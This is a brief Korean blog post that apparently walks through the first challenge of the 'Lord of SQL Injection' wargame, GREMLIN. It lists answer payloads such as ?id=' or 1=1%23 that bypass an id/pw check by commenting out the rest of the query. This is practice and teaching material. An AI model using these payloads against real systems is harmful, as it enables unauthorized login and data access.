300x250
lord of sqlinjection 첫번째 문제 - GREMLIN
제시된 query에서 where id='' and pw='' 구문을 참으로 만들면 정답을 맞출 수 있습니다.
$_GET[id], $_GET[pw]를 통해서 2개의 파라미터를 받지만 '#' 이나 '--'으로 이어지는 구문을 생략할 수 있으므로
id 파라미터만 채워도 문제를 해결할 수 있습니다.
* 정답 *
더보기
(%23 = #)
?id=' or 1=1%23
?id=' or 'x'='x'%23
?id=' || True%23
?id=' || 1%23
반응형
'IT Security' 카테고리의 다른 글
Lord of Sqlinjection - 3번 GOBLIN (0) | 2019.11.19 |
---|---|
Lord of Sqlinjection - 2번 COBOLT (0) | 2019.11.18 |
정보보안 ) EDR 솔루션 (0) | 2019.10.30 |
정보보안 ) Malware 뉴크스페드(NukeSped) (0) | 2019.10.28 |
정보보안 ) 파워쉘(PowerShell) (0) | 2019.10.28 |